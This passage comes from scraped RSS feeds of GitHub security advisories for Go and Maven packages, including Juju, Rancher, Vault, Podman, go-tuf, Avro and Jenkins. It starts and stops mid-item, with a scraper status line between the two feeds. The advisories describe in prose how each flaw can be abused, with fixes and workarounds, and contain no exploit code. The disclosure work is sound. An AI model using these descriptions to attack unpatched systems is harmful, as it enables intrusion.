<li><a href="https://github.com/pomerium/pomerium/releases/tag/v0.27.1">https://github.com/pomerium/pomerium/releases/tag/v0.27.1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47616" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47616</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-r7rh-jww5-5fjr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-r7rh-jww5-5fjr</guid>
<pubDate>Wed, 02 Oct 2024 21:33:11 GMT</pubDate>
</item>
<item>
<title>Duplicate Advisory: Juju makes Use of Weak Credentials</title>
<description><h2>Duplicate Advisory</h2>
<p>This advisory has been withdrawn because it is a duplicate of <a title="GHSA-mh98-763h-m9v4" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-mh98-763h-m9v4/hovercard" href="https://github.com/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a>. This link is maintained to preserve external references.</p>
<h2>Original Description</h2>
<p>JUJU_CONTEXT_ID is a predictable authentication secret. On a Juju machine (non-Kubernetes) or Juju charm container (on Kubernetes), an unprivileged user in the same network namespace can connect to an abstract domain socket and guess the JUJU_CONTEXT_ID value. This gives the unprivileged user access to the same information and tools as the Juju charm.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-mh98-763h-m9v4" href="https://github.com/juju/juju/security/advisories/GHSA-mh98-763h-m9v4">GHSA-mh98-763h-m9v4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7558" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7558</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-7558" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-7558</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-phh4-3hmm-24rx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-phh4-3hmm-24rx</guid>
<pubDate>Wed, 02 Oct 2024 12:30:33 GMT</pubDate>
</item>
<item>
<title>Duplicate Advisory: Vulnerable juju hook tool abstract UNIX domain socket</title>
<description><h2>Duplicate Advisory</h2>
<p>This advisory has been withdrawn because it is a duplicate of <a title="GHSA-8v4w-f4r9-7h6x" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-8v4w-f4r9-7h6x/hovercard" href="https://github.com/advisories/GHSA-8v4w-f4r9-7h6x">GHSA-8v4w-f4r9-7h6x</a>. This link is maintained to preserve external references.</p>
<h2>Original Description</h2>
<p>Vulnerable juju hook tool abstract UNIX domain socket. When combined with an attack of JUJU_CONTEXT_ID, any user on the local system with access to the default network namespace may connect to the @/var/lib/juju/agents/unit-xxxx-yyyy/agent.socket and perform actions that are normally reserved to a juju charm.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-8v4w-f4r9-7h6x" href="https://github.com/juju/juju/security/advisories/GHSA-8v4w-f4r9-7h6x">GHSA-8v4w-f4r9-7h6x</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8037" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8037</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-8037" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-8037</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fc27-7pf5-96v3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fc27-7pf5-96v3</guid>
<pubDate>Wed, 02 Oct 2024 12:30:33 GMT</pubDate>
</item>
<item>
<title>Duplicate Advisory: Juju Unprotected Alternate Channel vulnerability</title>
<description><h2>Duplicate Advisory</h2>
<p>This advisory has been withdrawn because it is a duplicate of <a title="GHSA-xwgj-vpm9-q2rq" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-xwgj-vpm9-q2rq/hovercard" href="https://github.com/advisories/GHSA-xwgj-vpm9-q2rq">GHSA-xwgj-vpm9-q2rq</a>. This link is maintained to preserve external references.</p>
<h2>Original Description</h2>
<p>Vulnerable juju introspection abstract UNIX domain socket. An abstract UNIX domain socket responsible for introspection is available without authentication locally to network namespace users. This enables denial of service attacks.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-xwgj-vpm9-q2rq" href="https://github.com/juju/juju/security/advisories/GHSA-xwgj-vpm9-q2rq">GHSA-xwgj-vpm9-q2rq</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8038" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8038</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-8038" rel="nofollow">https://www.cve.org/CVERecord?id=CVE-2024-8038</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-85qf-6845-m8p2</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-85qf-6845-m8p2</guid>
<pubDate>Wed, 02 Oct 2024 12:30:33 GMT</pubDate>
</item>
<item>
<title>Portainer improperly uses an encryption algorithm in the AesEncrypt function</title>
<description><p>Portainer before 2.20.2 improperly uses an encryption algorithm in the <code class="notranslate">AesEncrypt</code> function.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-33662" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-33662</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2271053598" data-permission-text="Title is private" data-url="https://github.com/portainer/portainer/issues/11737" data-hovercard-type="issue" data-hovercard-url="/portainer/portainer/issues/11737/hovercard" href="https://github.com/portainer/portainer/issues/11737">portainer/portainer#11737</a></li>
<li><a class="commit-link" href="https://github.com/portainer/portainer/compare/2.20.1...2.20.2">portainer/portainer@<tt>2.20.1...2.20.2</tt></a></li>
<li><a href="https://www.portainer.io/" rel="nofollow">https://www.portainer.io</a></li>
<li><a href="https://github.com/search?q=repo%3Aportainer%2Fportainer+EE-6764&amp;type=pullrequests">https://github.com/search?q=repo%3Aportainer%2Fportainer+EE-6764&amp;type=pullrequests</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9mjw-79r6-c9m8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9mjw-79r6-c9m8</guid>
<pubDate>Wed, 02 Oct 2024 06:30:26 GMT</pubDate>
</item>
<item>
<title>Improper Input Validation in Buildah and Podman</title>
<description><p>A vulnerability exists in the bind-propagation option of the Dockerfile RUN --mount instruction. The system does not properly validate the input passed to this option, allowing users to pass arbitrary parameters to the mount instruction. This issue can be exploited to mount sensitive directories from the host into a container during the build process and, in some cases, modify the contents of those mounted files. Even if SELinux is used, this vulnerability can bypass its protection by allowing the source directory to be relabeled to give the container access to host files.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9407" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9407</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-9407" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-9407</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2315887" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2315887</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fhqq-8f65-5xfc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fhqq-8f65-5xfc</guid>
<pubDate>Tue, 01 Oct 2024 21:31:35 GMT</pubDate>
</item>
<item>
<title>Link Following in github.com/containers/common</title>
<description><p>A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9341" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9341</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-9341" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-9341</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2315691" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2315691</a></li>
<li><a href="https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169">https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169</a></li>
<li><a href="https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349">https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/containers/common/commit/e7db06585c32e1a782c1d9aa3b71ccd708f5e23f/hovercard" href="https://github.com/containers/common/commit/e7db06585c32e1a782c1d9aa3b71ccd708f5e23f">containers/common@<tt>e7db065</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mc76-5925-c5p6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mc76-5925-c5p6</guid>
<pubDate>Tue, 01 Oct 2024 21:31:34 GMT</pubDate>
</item>
<item>
<title>Golang FIPS OpenSSL has a Use of Uninitialized Variable vulnerability</title>
<description><p>A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.&nbsp; It is also possible to force a derived key to be all zeros instead of an unpredictable value.&nbsp; This may have follow-on implications for the Go TLS stack.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9355" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9355</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-9355" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-9355</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2315719" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2315719</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:7502" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:7502</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:7550" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:7550</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3h3x-2hwv-hr52</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3h3x-2hwv-hr52</guid>
<pubDate>Tue, 01 Oct 2024 21:31:34 GMT</pubDate>
</item>
<item>
<title>Incorrect delegation lookups can make go-tuf download the wrong artifact</title>
<description><p>During the ongoing work on the TUF conformance test suite, we have come across a test that reveals what we believe is a bug in go-tuf with security implications. The bug exists in go-tuf delegation tracing and could result in downloading the wrong artifact.</p>
<p>We have come across this issue in the test in this PR: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2451719515" data-permission-text="Title is private" data-url="https://github.com/theupdateframework/tuf-conformance/issues/115" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard" href="https://github.com/theupdateframework/tuf-conformance/pull/115">theupdateframework/tuf-conformance#115</a>.</p>
<p>The test - <code class="notranslate">test_graph_traversal</code> - sets up a repository with a series of delegations, invokes the client's <code class="notranslate">refresh()</code> and then checks the order in which the client traced the delegations. The test shows that the go-tuf client inconsistently traces the delegations in a wrong way. For example, <a href="https://github.com/theupdateframework/tuf-conformance/pull/115#issuecomment-2275625542" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard">during one CI run</a>, the <code class="notranslate">two-level-delegations</code> test case triggered a wrong order. The delegations in this look as such:</p>
<div class="highlight highlight-source-python"><pre class="notranslate"><span class="pl-s">"two-level-delegations"</span>: <span class="pl-v">DelegationsTestCase</span>(
<span class="pl-s1">delegations</span><span class="pl-c1">=</span>[
<span class="pl-v">DelegationTester</span>(<span class="pl-s">"targets"</span>, <span class="pl-s">"A"</span>),
<span class="pl-v">DelegationTester</span>(<span class="pl-s">"targets"</span>, <span class="pl-s">"B"</span>),
<span class="pl-v">DelegationTester</span>(<span class="pl-s">"B"</span>, <span class="pl-s">"C"</span>),
],
<span class="pl-s1">visited_order</span><span class="pl-c1">=</span>[<span class="pl-s">"A"</span>, <span class="pl-s">"B"</span>, <span class="pl-s">"C"</span>],
),</pre></div>
<p>Here, <code class="notranslate">targets</code> delegates to <code class="notranslate">"A"</code> and to <code class="notranslate">"B"</code>, and <code class="notranslate">"B"</code> delegates to <code class="notranslate">"C"</code>. The client should trace the delegations in the order <code class="notranslate">"A"</code> then <code class="notranslate">"B"</code> then <code class="notranslate">"C"</code>, but in this particular CI run, go-tuf traced the delegations <code class="notranslate">"B"-&gt;"C"-&gt;"A"</code>.</p>
<p>In a subsequent CI run, this test case did not fail, but <a href="https://github.com/theupdateframework/tuf-conformance/pull/115#issuecomment-2275640487" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard">another one did</a>.</p>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jku/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jku">@jku</a> has done a bit of debugging and believes that the returned map of <code class="notranslate">GetRolesForTarget</code> returns a map that causes this behavior:</p>
<p><a href="https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580">https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580</a></p>
<p>We believe that this map should be an ordered list instead of a map.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-4f8r-qqr9-fq8j" href="https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-4f8r-qqr9-fq8j">GHSA-4f8r-qqr9-fq8j</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2451719515" data-permission-text="Title is private" data-url="https://github.com/theupdateframework/tuf-conformance/issues/115" data-hovercard-type="pull_request" data-hovercard-url="/theupdateframework/tuf-conformance/pull/115/hovercard" href="https://github.com/theupdateframework/tuf-conformance/pull/115">theupdateframework/tuf-conformance#115</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/theupdateframework/go-tuf/commit/f36420caba9edbfdfd64f95a9554c0836d9cf819/hovercard" href="https://github.com/theupdateframework/go-tuf/commit/f36420caba9edbfdfd64f95a9554c0836d9cf819">theupdateframework/go-tuf@<tt>f36420c</tt></a></li>
<li><a href="https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580">https://github.com/theupdateframework/go-tuf/blob/f95222bdd22d2ac4e5b8ed6fe912b645e213c3b5/metadata/metadata.go#L565-L580</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47534" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47534</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4f8r-qqr9-fq8j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4f8r-qqr9-fq8j</guid>
<pubDate>Tue, 01 Oct 2024 18:13:25 GMT</pubDate>
</item>
<item>
<title>Vault SSH Secrets Engine Configuration Did Not Restrict Valid Principals By Default</title>
<description><p>Vault’s SSH secrets engine did not require the valid_principals list to contain a value by default. If the valid_principals and default_user fields of the SSH secrets engine configuration are not set, an SSH certificate requested by an authorized user to Vault’s SSH secrets engine could be used to authenticate as any user on the host. Fixed in Vault Community Edition 1.17.6, and in Vault Enterprise 1.17.6, 1.16.10, and 1.15.15.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-7594" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-7594</a></li>
<li><a href="https://discuss.hashicorp.com/t/hcsec-2024-20-vault-ssh-secrets-engine-configuration-did-not-restrict-valid-principals-by-default/70251" rel="nofollow">https://discuss.hashicorp.com/t/hcsec-2024-20-vault-ssh-secrets-engine-configuration-did-not-restrict-valid-principals-by-default/70251</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jg74-mwgw-v6x3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jg74-mwgw-v6x3</guid>
<pubDate>Thu, 26 Sep 2024 21:31:11 GMT</pubDate>
</item>
<item>
<title>Rancher agents can be hijacked by taking over the Rancher Server URL</title>
<description><h3>Impact</h3>
<p>A vulnerability has been identified within Rancher that can be exploited in narrow circumstances through a man-in-the-middle (MITM) attack. An attacker would need to have control of an expired domain or execute a DNS spoofing/hijacking attack against the domain to exploit this vulnerability. The targeted domain is the one used as the Rancher URL.</p>
<p>SUSE is unaware of any successful exploitation of this vulnerability, which has a high complexity bar.</p>
<p>Please consult the associated <a href="https://attack.mitre.org/techniques/T1557/" rel="nofollow">MITRE ATT&amp;CK - Technique - Adversary-in-the-Middle</a> for further information about this attack category.</p>
<h3>Patches</h3>
<p>A new setting, <a href="https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings" rel="nofollow"><code class="notranslate">agent-tls-mode</code></a>, was added, which allows users to specify if agents will use <code class="notranslate">strict</code> certificate verification when connecting to Rancher. The field can be set to <code class="notranslate">strict</code> (which requires the agent to verify the certificate using only the Certificate Authority in the <code class="notranslate">cacerts</code> setting) or <code class="notranslate">system-store</code> (which allows the agent to verify the certificate using any Certificate Authority in the operating system's trust store). This setting will default to strict on new installs of Rancher <code class="notranslate">v2.8.6</code>, <code class="notranslate">v2.9.0</code>, and newer versions. When upgrading from a prior version, the current value will be kept. If updating from older versions, the settings must be manually configured.</p>
<p><strong>Important:</strong> For non-Windows nodes, this is fixed since <code class="notranslate">v2.8.6</code> and <code class="notranslate">v2.9.0</code>. For Windows nodes, this is fully fixed starting with <code class="notranslate">v2.8.8</code> and <code class="notranslate">v2.9.2</code>.</p>
<p>Patched versions include releases <code class="notranslate">v2.8.8</code> and <code class="notranslate">v2.9.2</code>.</p>
<p>For non-Windows nodes, the fix was released with <code class="notranslate">v2.7.15</code>. However, if you are running Rancher <code class="notranslate">v2.7.x</code> and have Windows nodes, you must follow the below workaround to address this issue on those nodes.</p>
<h3>Workarounds</h3>
<p>If you can't update, please follow the standard security practices including:</p>
<ol>
<li>Properly control the expiration and ownership of the domain used as the Rancher URL (the <code class="notranslate">server-url</code> of the Rancher cluster).</li>
<li>Enabling DNSSEC as a way to protect against DNS spoofing or hijacking attacks.</li>
<li>Properly clean up and decommission unused clusters and downstream clusters, instead of leaving them behind. For example, downstream clusters which are alive while the main Rancher server is no longer available.</li>
</ol>
<p>In some cases, Windows nodes added to RKE2 clusters may not be automatically updated with the desired <code class="notranslate">agent-tls-mode</code>. Windows clusters running at least the August patches (<code class="notranslate">v1.27.16</code>, <code class="notranslate">v1.28.13</code>, <code class="notranslate">v1.29.8</code>, <code class="notranslate">v1.30.4</code>) will be automatically updated. For Windows nodes running older versions of RKE2, this issue can be manually resolved by following these <a href="https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify">instructions</a>.</p>
<p>If you are running Rancher <code class="notranslate">v2.7.x</code>, Windows nodes will not automatically update, and you must follow the above <a href="https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify">instructions</a>, with the following notes:</p>
<ol>
<li>This needs to be done for all existing Windows nodes and any new nodes provisioned.</li>
<li>You must omit the <code class="notranslate">DownloadWins</code> flag, and must instead manually download the <code class="notranslate">rancher-wins</code> version <a href="https://github.com/rancher/wins/releases/tag/v0.4.18">0.4.18</a>, or greater, from its GitHub repository and place it in the required directories:<br>
a. <code class="notranslate">c:\Windows</code><br>
b. <code class="notranslate">c:\user\local\bin</code></li>
<li>You must restart the nodes after running the script; simply restarting <code class="notranslate">rancher-wins</code> or RKE2 will result in <a href="https://github.com/rancher/rke2/issues/5551" data-hovercard-type="issue" data-hovercard-url="/rancher/rke2/issues/5551/hovercard">pod networking errors</a>. The only scenario where you do not need to completely restart the node is if the cluster is running version <code class="notranslate">v1.27.16</code> or higher.</li>
</ol>
<h3>Credits</h3>
<p>This issue was found and reported by Jarkko Vesiluoma from Redtest Security.</p>
<h3>For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Reach out to the <a href="https://github.com/rancher/rancher/security/policy">SUSE Rancher Security team</a> for security related inquiries.</li>
<li>Open an issue in the <a href="https://github.com/rancher/rancher/issues/new/choose">Rancher</a> repository.</li>
<li>Verify with our <a href="https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/" rel="nofollow">support matrix</a> and <a href="https://www.suse.com/lifecycle/" rel="nofollow">product support lifecycle</a>.</li>
</ul>
<h3>References</h3>
<ul>
<li><a title="GHSA-h4h5-9833-v2p4" href="https://github.com/rancher/rancher/security/advisories/GHSA-h4h5-9833-v2p4">GHSA-h4h5-9833-v2p4</a></li>
<li><a href="https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify">https://github.com/rancherlabs/support-tools/tree/master/windows-agent-strict-verify</a></li>
<li><a href="https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings" rel="nofollow">https://ranchermanager.docs.rancher.com/getting-started/installation-and-upgrade/installation-references/tls-settings</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-h4h5-9833-v2p4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-h4h5-9833-v2p4</guid>
<pubDate>Thu, 26 Sep 2024 21:13:08 GMT</pubDate>
</item>
<item>
<title>Ory Kratos's setting required_aal `highest_available` does not properly respect code + mfa credentials</title>
<description><h2>Preconditions</h2>
<ul>
<li>The <code class="notranslate">code</code> login method is enabled with the <code class="notranslate">passwordless_enabled</code> flag set to <code class="notranslate">true</code>.</li>
<li>A 2FA method such as <code class="notranslate">totp</code> is enabled.</li>
<li><code class="notranslate">required_aal</code> of the whoami check or the settings flow is set to <code class="notranslate">highest_available</code>. AAL stands for Authenticator Assurance Levels and can range from 0 (no factor) to 2 (two factors).</li>
<li>A user uses the <code class="notranslate">code</code> method as the <strong>only</strong> login method available. They do not have a password or any other first factor credential enabled.</li>
<li>The user has 2FA enabled.</li>
<li>The user’s <code class="notranslate">available_aal</code> is incorrectly stored in the database as <code class="notranslate">aal1</code> or <code class="notranslate">aal0</code> or <code class="notranslate">NULL</code>.</li>
<li>A user signs in using the code method, but does not complete the 2FA challenge.</li>
</ul>
<p><strong>Example server configuration</strong></p>
<p>Below you will find a vulnerable example configuration. Keep in mind that, for the account to be vulnerable, the account must have no first factor except the <code class="notranslate">code</code> method enabled plus a second factor.</p>
<pre class="notranslate"><code class="notranslate">selfservice:
methods:
code:
# ... |
http://localhost:1200/github/advisor/data/reviewed/maven - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - maven - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/maven" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - maven - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:06 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>JSON-lib mishandles an unbalanced comment string</title>
<description><p>util/JSONTokener.java in JSON-lib before 3.1.0 mishandles an unbalanced comment string.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47855" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47855</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/kordamp/json-lib/commit/a0c4a0eae277130e22979cf307c95dec4005a78e/hovercard" href="https://github.com/kordamp/json-lib/commit/a0c4a0eae277130e22979cf307c95dec4005a78e">kordamp/json-lib@<tt>a0c4a0e</tt></a></li>
<li><a class="commit-link" href="https://github.com/kordamp/json-lib/compare/v3.0.3...v3.1.0">kordamp/json-lib@<tt>v3.0.3...v3.1.0</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wwcp-26wc-3fxm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wwcp-26wc-3fxm</guid>
<pubDate>Fri, 04 Oct 2024 06:30:45 GMT</pubDate>
</item>
<item>
<title>Apache Commons IO: Possible denial of service attack on untrusted input to XmlStreamReader</title>
<description><p>Uncontrolled Resource Consumption vulnerability in Apache Commons IO.</p>
<p>The <code class="notranslate">org.apache.commons.io.input.XmlStreamReader</code> class may excessively consume CPU resources when processing maliciously crafted input.</p>
<p>This issue affects Apache Commons IO: from 2.0 before 2.14.0.</p>
<p>Users are recommended to upgrade to version 2.14.0 or later, which fixes the issue.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47554" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47554</a></li>
<li><a href="https://lists.apache.org/thread/6ozr91rr9cj5lm0zyhv30bsp317hk5z1" rel="nofollow">https://lists.apache.org/thread/6ozr91rr9cj5lm0zyhv30bsp317hk5z1</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78wr-2p64-hpwj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78wr-2p64-hpwj</guid>
<pubDate>Thu, 03 Oct 2024 12:30:48 GMT</pubDate>
</item>
<item>
<title>Apache Avro Java SDK: Arbitrary Code Execution when reading Avro Data (Java SDK)</title>
<description><p>Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code.<br>
Users are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47561" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47561</a></li>
<li><a href="https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x" rel="nofollow">https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-r7pg-v2c8-mfg3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-r7pg-v2c8-mfg3</guid>
<pubDate>Thu, 03 Oct 2024 12:30:48 GMT</pubDate>
</item>
<item>
<title>Jenkins Credentials plugin reveals encrypted values of credentials to users with Extended Read permission</title>
<description><p>Jenkins Credentials Plugin 1380.va_435002fa_924 and earlier, except 1371.1373.v4eb_fa_b_7161e9, does not redact encrypted values of credentials using the <code class="notranslate">SecretBytes</code> type (e.g., Certificate credentials, or Secret file credentials from Plain Credentials Plugin) when accessing item <code class="notranslate">config.xml</code> via REST API or CLI.</p>
<p>This allows attackers with Item/Extended Read permission to view encrypted <code class="notranslate">SecretBytes</code> values in credentials.</p>
<p>This issue is similar to SECURITY-266 in the 2016-05-11 security advisory, which applied to the <code class="notranslate">Secret</code> type used for inline secrets and some credentials types.</p>
<p>Credentials Plugin 1381.v2c3a_12074da_b_ redacts the encrypted values of credentials using the <code class="notranslate">SecretBytes</code> type in item <code class="notranslate">config.xml</code> files.</p>
<p>This fix is only effective on Jenkins 2.479 and newer, LTS 2.462.3 and newer. While Credentials Plugin 1381.v2c3a_12074da_b_ can be installed on Jenkins 2.463 through 2.478 (both inclusive), encrypted values of credentials using the <code class="notranslate">SecretBytes</code> type will not be redacted when accessing item <code class="notranslate">config.xml</code> via REST API or CLI.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47805" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47805</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3373" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3373</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-62jv-j4w7-5hh8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-62jv-j4w7-5hh8</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins item creation restriction bypass vulnerability</title>
<description><p>Jenkins provides APIs for fine-grained control of item creation:</p>
<ul>
<li>
<p>Authorization strategies can prohibit the creation of items of a given type in a given item group (<code class="notranslate">ACL#hasCreatePermission2</code>).</p>
</li>
<li>
<p>Item types can prohibit creation of new instances in a given item group (<code class="notranslate">TopLevelItemDescriptor#isApplicableIn(ItemGroup)</code>).</p>
</li>
</ul>
<p>If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.478 and earlier, LTS 2.462.2 and earlier creates the item in memory, only deleting it from disk.</p>
<p>This allows attackers with Item/Create permission to bypass these restrictions, creating a temporary item. With Item/Configure permission, they can also save the item to persist it.</p>
<p>If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.479, LTS 2.462.3 does not retain the item in memory.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47804" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47804</a></li>
